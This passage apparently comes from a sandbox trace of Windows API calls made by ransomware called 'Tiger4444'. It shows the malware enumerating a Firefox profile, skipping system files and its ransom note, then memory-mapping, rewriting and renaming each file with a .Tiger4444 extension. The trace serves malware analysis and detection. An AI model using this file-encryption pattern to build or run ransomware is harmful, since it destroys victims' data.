ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x500000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="places.sqlite", cAlternateFileName="PLACES~1.SQL")) returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="Tiger4444.exe") returned -1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2=".") returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="..") returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="windows") returned -1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="bootmgr") returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="pagefile.sys") returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="boot") returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="ids.txt") returned 1 [0050.663] lstrcmpiW (lpString1="places.sqlite", lpString2="NTUSER.DAT") returned 1 [0050.663] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="places.sqlite" | out: lpString1="places.sqlite") returned="places.sqlite" [0050.663] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite", dwFileAttributes=0x0) returned 1 [0050.663] lstrlenW (lpString="places.sqlite") returned 13 [0050.663] lstrlenW (lpString="Tiger4444") returned 9 [0050.663] lstrcmpiW (lpString1="es.sqlite", lpString2="Tiger4444") returned -1 [0050.663] lstrlenW (lpString=".dll") returned 4 [0050.664] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0050.664] lstrlenW (lpString=".lnk") returned 4 [0050.664] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0050.664] lstrlenW (lpString=".ini") returned 4 [0050.664] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0050.664] lstrlenW (lpString=".sys") returned 4 [0050.664] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0050.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.664] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.664] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14211697121) returned 1 [0050.664] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=5242880) returned 1 [0050.664] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0050.664] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0050.664] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500300, lpName=0x0) returned 0x2c8 [0050.665] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x100300) returned 0x30b0000 [0050.695] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x31c0000 [0050.753] UnmapViewOfFile (lpBaseAddress=0x31c0000) returned 1 [0050.785] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x200000) returned 0x31c0000 [0050.912] UnmapViewOfFile (lpBaseAddress=0x31c0000) returned 1 [0050.935] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.936] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0050.936] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.936] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0050.936] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.936] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0050.936] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.936] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0050.936] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14238900738) returned 1 [0050.936] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0050.936] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0050.936] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0050.947] CloseHandle (hObject=0x2c8) returned 1 [0050.947] CloseHandle (hObject=0x260) returned 1 [0050.947] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite.Tiger4444") returned 97 [0050.947] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0050.948] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba329010, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xba329010, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x72e7b76, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="places.sqlite-shm", cAlternateFileName="PLACES~3.SQL")) returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="Tiger4444.exe") returned -1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2=".") returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="..") returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="windows") returned -1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="bootmgr") returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="pagefile.sys") returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="boot") returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="ids.txt") returned 1 [0050.948] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="NTUSER.DAT") returned 1 [0050.948] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="places.sqlite-shm" | out: lpString1="places.sqlite-shm") returned="places.sqlite-shm" [0050.948] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm", dwFileAttributes=0x0) returned 1 [0050.949] lstrlenW (lpString="places.sqlite-shm") returned 17 [0050.949] lstrlenW (lpString="Tiger4444") returned 9 [0050.949] lstrcmpiW (lpString1="qlite-shm", lpString2="Tiger4444") returned -1 [0050.949] lstrlenW (lpString=".dll") returned 4 [0050.949] lstrcmpiW (lpString1="-shm", lpString2=".dll") returned 1 [0050.949] lstrlenW (lpString=".lnk") returned 4 [0050.949] lstrcmpiW (lpString1="-shm", lpString2=".lnk") returned 1 [0050.949] lstrlenW (lpString=".ini") returned 4 [0050.949] lstrcmpiW (lpString1="-shm", lpString2=".ini") returned 1 [0050.949] lstrlenW (lpString=".sys") returned 4 [0050.949] lstrcmpiW (lpString1="-shm", lpString2=".sys") returned 1 [0050.949] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-shm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.949] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.949] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14240248614) returned 1 [0050.949] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=32768) returned 1 [0050.950] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0050.950] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0050.950] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x2c8 [0050.951] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0xbe0000 [0050.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0050.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0050.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0050.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0050.969] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14242189887) returned 1 [0050.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0050.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0050.969] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.969] CloseHandle (hObject=0x2c8) returned 1 [0050.969] CloseHandle (hObject=0x260) returned 1 [0050.969] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm.Tiger4444") returned 101 [0050.969] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-shm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-shm.tiger4444"), dwFlags=0x1) returned 1 [0050.970] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba329010, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xba329010, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xb8154a58, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x208638, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="places.sqlite-wal", cAlternateFileName="PLACES~2.SQL")) returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="Tiger4444.exe") returned -1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2=".") returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="..") returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="windows") returned -1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="bootmgr") returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="pagefile.sys") returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="boot") returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="ids.txt") returned 1 [0050.970] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="NTUSER.DAT") returned 1 [0050.970] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="places.sqlite-wal" | out: lpString1="places.sqlite-wal") returned="places.sqlite-wal" [0050.970] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal", dwFileAttributes=0x0) returned 1 [0050.970] lstrlenW (lpString="places.sqlite-wal") returned 17 [0050.970] lstrlenW (lpString="Tiger4444") returned 9 [0050.970] lstrcmpiW (lpString1="qlite-wal", lpString2="Tiger4444") returned -1 [0050.970] lstrlenW (lpString=".dll") returned 4 [0050.971] lstrcmpiW (lpString1="-wal", lpString2=".dll") returned 1 [0050.971] lstrlenW (lpString=".lnk") returned 4 [0050.971] lstrcmpiW (lpString1="-wal", lpString2=".lnk") returned 1 [0050.971] lstrlenW (lpString=".ini") returned 4 [0050.971] lstrcmpiW (lpString1="-wal", lpString2=".ini") returned 1 [0050.971] lstrlenW (lpString=".sys") returned 4 [0050.971] lstrcmpiW (lpString1="-wal", lpString2=".sys") returned 1 [0050.971] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-wal"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.971] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.971] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14242398550) returned 1 [0050.971] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2131512) returned 1 [0050.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0050.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0050.971] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x208940, lpName=0x0) returned 0x2c8 [0050.972] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x8940) returned 0xbe0000 [0050.988] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x30b0000 [0051.080] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0051.097] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.097] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0051.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.097] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0051.097] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0051.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0051.097] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14255006188) returned 1 [0051.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0051.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0051.097] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.097] CloseHandle (hObject=0x2c8) returned 1 [0051.097] CloseHandle (hObject=0x260) returned 1 [0051.098] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal.Tiger4444") returned 101 [0051.098] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-wal"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-wal.tiger4444"), dwFlags=0x1) returned 1 [0051.098] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40cce7aa, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40cce7aa, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x40ccfb2d, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x1cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pluginreg.dat", cAlternateFileName="PLUGIN~1.DAT")) returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Tiger4444.exe") returned -1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".") returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="..") returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="windows") returned -1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="bootmgr") returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="pagefile.sys") returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="boot") returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ids.txt") returned 1 [0051.098] lstrcmpiW (lpString1="pluginreg.dat", lpString2="NTUSER.DAT") returned 1 [0051.098] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="pluginreg.dat" | out: lpString1="pluginreg.dat") returned="pluginreg.dat" [0051.098] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat", dwFileAttributes=0x0) returned 1 [0051.099] lstrlenW (lpString="pluginreg.dat") returned 13 [0051.099] lstrlenW (lpString="Tiger4444") returned 9 [0051.099] lstrcmpiW (lpString1="inreg.dat", lpString2="Tiger4444") returned -1 [0051.099] lstrlenW (lpString=".dll") returned 4 [0051.099] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0051.099] lstrlenW (lpString=".lnk") returned 4 [0051.099] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0051.099] lstrlenW (lpString=".ini") returned 4 [0051.099] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0051.099] lstrlenW (lpString=".sys") returned 4 [0051.099] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0051.099] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\pluginreg.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.099] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.100] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14255262588) returned 1 [0051.100] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=461) returned 1 [0051.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0051.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0051.100] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4d0, lpName=0x0) returned 0x2c8 [0051.102] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4d0) returned 0xbe0000 [0051.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0051.104] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0051.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.104] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0051.104] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0051.105] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14255764869) returned 1 [0051.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0051.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0051.105] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.105] CloseHandle (hObject=0x2c8) returned 1 [0051.105] CloseHandle (hObject=0x260) returned 1 [0051.105] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat.Tiger4444") returned 97 [0051.105] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\pluginreg.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\pluginreg.dat.tiger4444"), dwFlags=0x1) returned 1 [0051.105] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8285d1c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8285d1c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x93d01742, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x1fcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prefs.js", cAlternateFileName="")) returned 1 [0051.105] lstrcmpiW (lpString1="prefs.js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.105] lstrcmpiW (lpString1="prefs.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.105] lstrcmpiW (lpString1="prefs.js", lpString2="Tiger4444.exe") returned -1 [0051.106] lstrcmpiW (lpString1="prefs.js", lpString2=".") returned 1 [0051.106] lstrcmpiW (lpString1="prefs.js", lpString2="..") returned 1 [0051.106] lstrcmpiW (lpString1="prefs.js", lpString2="windows") returned -1 [0051.106] lstrcmpiW (lpString1="prefs.js", lpString2="bootmgr") returned 1 [0051.106] lstrcmpiW (lpString1="prefs.js", lpString2="pagefile.sys") returned 1 [0051.106] lstrcmpiW (lpString1="prefs.js", lpString2="boot") returned 1 [0051.106] lstrcmpiW (lpString1="prefs.js", lpString2="ids.txt") returned 1 [0051.106] lstrcmpiW (lpString1="prefs.js", lpString2="NTUSER.DAT") returned 1 [0051.106] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="prefs.js" | out: lpString1="prefs.js") returned="prefs.js" [0051.106] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js", dwFileAttributes=0x0) returned 1 [0051.106] lstrlenW (lpString="prefs.js") returned 8 [0051.106] lstrlenW (lpString="Tiger4444") returned 9 [0051.106] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0051.106] lstrlenW (lpString=".dll") returned 4 [0051.106] lstrcmpiW (lpString1="s.js", lpString2=".dll") returned 1 [0051.106] lstrlenW (lpString=".lnk") returned 4 [0051.106] lstrcmpiW (lpString1="s.js", lpString2=".lnk") returned 1 [0051.106] lstrlenW (lpString=".ini") returned 4 [0051.106] lstrcmpiW (lpString1="s.js", lpString2=".ini") returned 1 [0051.106] lstrlenW (lpString=".sys") returned 4 [0051.106] lstrcmpiW (lpString1="s.js", lpString2=".sys") returned 1 